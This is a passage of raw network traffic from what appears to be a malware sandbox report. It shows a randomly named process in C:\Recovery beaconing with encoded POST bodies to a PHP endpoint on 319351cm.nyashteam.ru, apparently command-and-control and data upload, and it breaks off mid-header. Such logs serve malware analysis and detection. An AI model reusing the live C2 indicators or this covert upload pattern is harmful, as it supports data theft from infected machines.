Dec 6, 2024 03:13:19.945638895 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:20.295690060 CET	1012	OUT	Data Raw: 53 55 5a 59 59 5f 53 5c 5c 56 52 5a 50 5e 5a 56 58 58 5b 5c 50 5b 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SUZYY_S\\VRZP^ZVXX[\P[V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!*#=)2<?#^1]:&'.^)> #22:?_"7T,']/!Q!0
Dec 6, 2024 03:13:21.030962944 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:21.264940977 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NtZ2tfyQ5kvq6waD4al9vRTNsg08PsfV1LJtW3tNvGS13Wx31O3k9Idb4p64crBvZu4OdmU0LLS%2FUm1mcssoCSQFaYrrhxksnlXOfbftWKbYCpoTa1X0%2FOn9NiBA4T%2Bj5K7i9%2FIGkBA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c19578d74400-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3848&min_rtt=1633&rtt_var=5043&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=75421&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49931	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:21.510137081 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:21.858238935 CET	1012	OUT	Data Raw: 53 54 5a 5c 59 5b 56 58 5c 56 52 5a 50 53 5a 51 58 5a 5b 5c 50 5a 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: STZ\Y[VX\VRZPSZQXZ[\PZVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A( 28<57\2+-U1<?V3.),4,5S'\"T/-']/!Q!
Dec 6, 2024 03:13:22.596486092 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:22.859915972 CET	819	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0f%2F%2F1Uv8d%2BfxfLhDu6tTW9cU0Jv8cWlXOSFI3k0siZ%2BlFuUNyCRunqY0Z3bEQ%2B51bdIslg6HmQACyC0qsqi4yMFyo6H2cXHQLIGpxGu0YRilKH%2BXC956MKGjp%2Fxt4%2FvK68m%2FZBRZSp0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c19f3b2c0c8e-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3639&min_rtt=1750&rtt_var=4435&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=86559&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	49934	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:23.101032972 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:23.451878071 CET	1012	OUT	Data Raw: 56 52 5f 5e 5c 58 56 52 5c 56 52 5a 50 58 5a 53 58 5c 5b 58 50 5e 56 5e 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VR_^\XVR\VRZPXZSX\[XP^V^Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!(0>)2T<5,%%,#$9*=/\ ?&0#8'W/']/!Q!(
Dec 6, 2024 03:13:24.198321104 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:24.475007057 CET	810	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=84CjRNv%2FbgmGzKk1eYo%2F7CjJK0yeeh3%2FV1iYDrs68WzvD9OnU98cHM%2BVRLMsVNlFFNbBrndFgj%2Bg3HvffDJZgXosP88lg0AKQwG1btU1dwNnNbd1D%2BSgh8GbMnZgN%2B3dPn0HCauo7k0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1a94a18422f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4548&min_rtt=1764&rtt_var=6230&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=60734&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	49940	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:24.588857889 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:24.936264038 CET	1296	OUT	Data Raw: 56 50 5f 59 59 5d 53 5e 5c 56 52 5a 50 5c 5a 55 58 5a 5b 5c 50 5c 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_YY]S^\VRZP\ZUXZ[\P\V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"@>39Y>2;W(#&)R%+W%;9*?Y7<"'98!4.=']/!Q!8
Dec 6, 2024 03:13:25.687683105 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:25.983552933 CET	954	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JmJI8mR5HlhTS0%2BmTqkRfAMkWcHR9auzuRyt58LUKIqfO53awvjU8JEZCGG7rnrlkNne1E01BklQjh6rtEZoborznRDKgfqXpGIJmtL82izKsYa4tsnwReNtJ%2FOynlvu3tMClaOCIiM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1b29ac641e6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3995&min_rtt=1808&rtt_var=5052&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=75628&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 26 05 27 5b 34 5f 36 0b 38 5a 3a 00 0d 09 31 07 3d 19 2c 38 2c 5f 35 5d 26 01 2b 01 2c 1c 25 34 09 59 3d 05 39 13 3e 3c 3b 1c 3e 02 23 5b 00 13 26 17 3e 2d 2e 52 3e 39 20 19 27 23 0b 00 2a 50 3e 59 3e 10 2f 51 37 14 29 14 35 3d 20 1a 27 5b 3c 0b 2f 0b 34 17 3c 27 00 19 26 34 21 5e 0e 11 3a 0d 26 0d 08 58 20 16 24 0f 25 56 27 02 28 29 3c 13 30 11 3f 55 3c 34 2b 0d 27 21 04 0d 33 3f 02 55 32 29 25 07 23 01 2f 1c 2e 2c 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&'[4_68Z:1=,8,_5]&+,%4Y=9><;>#[&>-.R>9 '#*P>Y>/Q7)5= '[</4<'&4!^:&X $%V'()<0?U<4+'!3?U2)%#/.,#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	49941	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:24.712661982 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1000 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:25.061328888 CET	1000	OUT	Data Raw: 53 56 5f 58 59 59 53 59 5c 56 52 5a 50 5a 5a 54 58 58 5b 57 50 5d 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_XYYSY\VRZPZZTXX[WP]V[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"*:=T#U<&#&%W2<$;>X=>/#?2:\"8 ;-']/!Q!(
Dec 6, 2024 03:13:25.798698902 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:26.042028904 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r4OQ4qB6%2BIaDHAyubYbKm617NqRppET%2BbJGydRgMvKk4%2FpVhgCjcVkxzTrG1a4XFPU5F67Bc03RjR9gotIUFGkn2epMqgcefmtXGjn68MjUNPRehnW4LId1pd8Gfksjk9g%2FXbNXCqeM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1b3487e0f6b-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3609&min_rtt=1654&rtt_var=4530&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1297&delivery_rate=84417&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49948	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:26.291549921 CET	273	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue
Dec 6, 2024 03:13:26.639564991 CET	1012	OUT	Data Raw: 53 54 5f 58 59 5e 53 5f 5c 56 52 5a 50 53 5a 53 58 5c 5b 5f 50 58 56 55 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: ST_XY^S_\VRZPSZSX\[_PXVUZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP"A00?'_15T&,T%;&(.Z ?5S':+^68(8']/!Q!
Dec 6, 2024 03:13:27.395282984 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:27.692084074 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BuCWl0yrdtYaHOEJM6hd1FYF9AtFs7hUUKz494zpvtsuz0Lp%2Bb6kH8%2FOL0R1bDnpIk4cTMQUtwOSih%2FbFoBUBxSkjE5DloiLvkqUU9TQIsBwn0PE%2FeON6lxQGrMs%2BW5ggLMaIdUBvo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1bd38d94204-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3984&min_rtt=1744&rtt_var=5134&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1285&delivery_rate=74243&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a Data Ascii: 42V\U
Dec 6, 2024 03:13:27.884040117 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49952	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:28.133522034 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:28.483169079 CET	1012	OUT	Data Raw: 56 50 5f 5d 59 5f 56 59 5c 56 52 5a 50 5d 5a 5d 58 59 5b 5e 50 54 56 5b 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VP_]Y_VY\VRZP]Z]XY[^PTV[Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">->'V+&?_%+U%/'U%(=>>']7Y6%:8#(0,-']/!Q!
Dec 6, 2024 03:13:29.217797995 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:29.453210115 CET	811	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZcvdVuaztYnuzm18hm7m%2FR%2FlubfWfc1P5OWI%2Bw89vp%2FHB1hUPD0gqvbe%2F10hE6SLGdnb44DwevOB0LNTs09xdjhiMBub4quTB8z76EkpdjEKMwGPk4csURaomhPd4nPXez6C7DNVcPs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1c8aa1d0fa4-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4012&min_rtt=1697&rtt_var=5267&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=72198&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	49955	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:29.695091009 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:30.045945883 CET	1012	OUT	Data Raw: 56 55 5f 5e 5c 58 53 5f 5c 56 52 5a 50 52 5a 56 58 5d 5b 5e 50 59 56 5a 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VU_^\XS_\VRZPRZVX][^PYVZZ^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP">3%X=1$+5(282?+0+9., 62)/Y#8'8']/!Q!
Dec 6, 2024 03:13:30.780194998 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:31.051516056 CET	808	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WPvb9hJFlqojkjzD9htuULPjMAgmrK1%2Berc3EZBabnr8VRfVshPKEVYaQGEnNk%2FnM%2F5imFRfHyQpQJ3B4t0Hvg3GMbbbKFw4XoQJ5I6fOgZNGnDrURn5mp4j6WVho5Uoaj7eV%2FMrOiw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1d26994f5f4-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3998&min_rtt=1642&rtt_var=5329&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1309&delivery_rate=71236&cwnd=85&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 56 5c 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 42V\U0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	49961	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:31.120975971 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1296 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:31.467526913 CET	1296	OUT	Data Raw: 53 56 5f 58 59 59 53 59 5c 56 52 5a 50 5b 5a 56 58 58 5b 56 50 5b 56 5d 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: SV_XYYSY\VRZP[ZVXX[VP[V]Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP!) ]>!?+5^%(%%<T$(-).\ .%+X!#;-']/!Q!$
Dec 6, 2024 03:13:32.210465908 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:32.485982895 CET	959	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kOBlydRoJA4zSjLb0cbbyNzJ%2Fm0KBAZqAsWxUoc8XV0QpxJCoYJhXS9G%2BxyJ7p88DZHvxemqJZ8cbP9szToZSg6y4p57HqhVgrsjyh7Rp51Mx4MEb1jC0yKQMDz%2BVu4UyzsV%2FkJ5Uvw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1db58fc42ec-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3572&min_rtt=2244&rtt_var=3498&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1593&delivery_rate=113415&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1e 25 59 25 2d 2c 5b 36 32 2c 5b 2d 00 0e 50 31 07 25 19 39 38 0e 59 36 2b 3d 5e 28 2c 23 0c 24 34 01 1b 2a 05 29 12 3f 2c 38 0d 2b 28 23 5b 00 13 26 5f 2a 03 2a 51 2a 07 24 17 32 0a 35 04 3e 36 07 03 3d 2e 0a 0e 20 3a 39 1b 23 3d 23 08 24 5b 24 0a 2f 36 34 5a 3f 09 0f 09 26 24 21 5e 0e 11 3a 0d 31 0a 32 5a 37 3b 23 56 31 09 30 58 29 2a 2f 06 27 59 23 51 28 34 0a 1e 25 21 0b 1e 24 3f 20 57 27 2a 39 07 20 01 09 55 2e 16 23 5f 2c 01 2c 52 0d 35 54 51 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%Y%-,[62,[-P1%98Y6+=^(,#$4)?,8+(#[&_Q$25>6=. :9#=#$[$/64Z?&$!^:12Z7;#V10X)/'Y#Q(4%!$? W'9 U.#_,,R5TQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	49962	172.67.186.200	80	1088	C:\Recovery\EeMFgDHDyZvTl.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 03:13:31.246064901 CET	297	OUT	POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 319351cm.nyashteam.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Dec 6, 2024 03:13:31.592523098 CET	1008	OUT	Data Raw: 56 54 5f 50 5c 5b 56 5e 5c 56 52 5a 50 5a 5a 50 58 58 5b 5f 50 5d 56 5f 5a 5e 43 5a 55 5e 56 5d 59 45 54 5a 51 59 53 5f 42 5e 51 5c 57 5e 5c 5e 53 5b 5c 58 43 5c 50 50 51 5c 5a 57 5b 52 51 59 54 57 5c 5a 54 5f 55 52 58 5f 5b 5d 5f 5c 5a 54 5a 5c Data Ascii: VT_P\[V^\VRZPZZPXX[_P]V_Z^CZU^V]YETZQYS_B^Q\W^\^S[\XC\PPQ\ZW[RQYTW\ZT_URX_[]_\ZTZ\YQW@^_UQQQXQ^[XPCW]T]^]YXP^WZ^UX_\ZRYPUIZS\T_^ZZ_W^[]^]\]]U^Y^S[UYXXW[]]BY]^UPX\Y]]VZRUQ[W]X[V_C\]\_ZP")=>1/U<#^%9T2?R3!)#X!?1W&*8!8;/-']/!Q!0
Dec 6, 2024 03:13:32.331662893 CET	25	IN	HTTP/1.1 100 Continue
Dec 6, 2024 03:13:32.627780914 CET	809	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 02:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXxZVwHS%2F1VpJY3QME2QWhd5%2BXeSX12pyl3NxBINVGNBZgknCdk4Lx9HeRJ%2B2fETxzPDSxhGati%2Bn4tkVI6ZEZcdCsZJOENpBwiIUV3vIRaIIPQ3lHrvrdSKmrkpzgAwOdcLCHMgXDY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ed8c1dc1b197d1a-EWR alt-svc: h2=":443"; ma=60 server-timing: 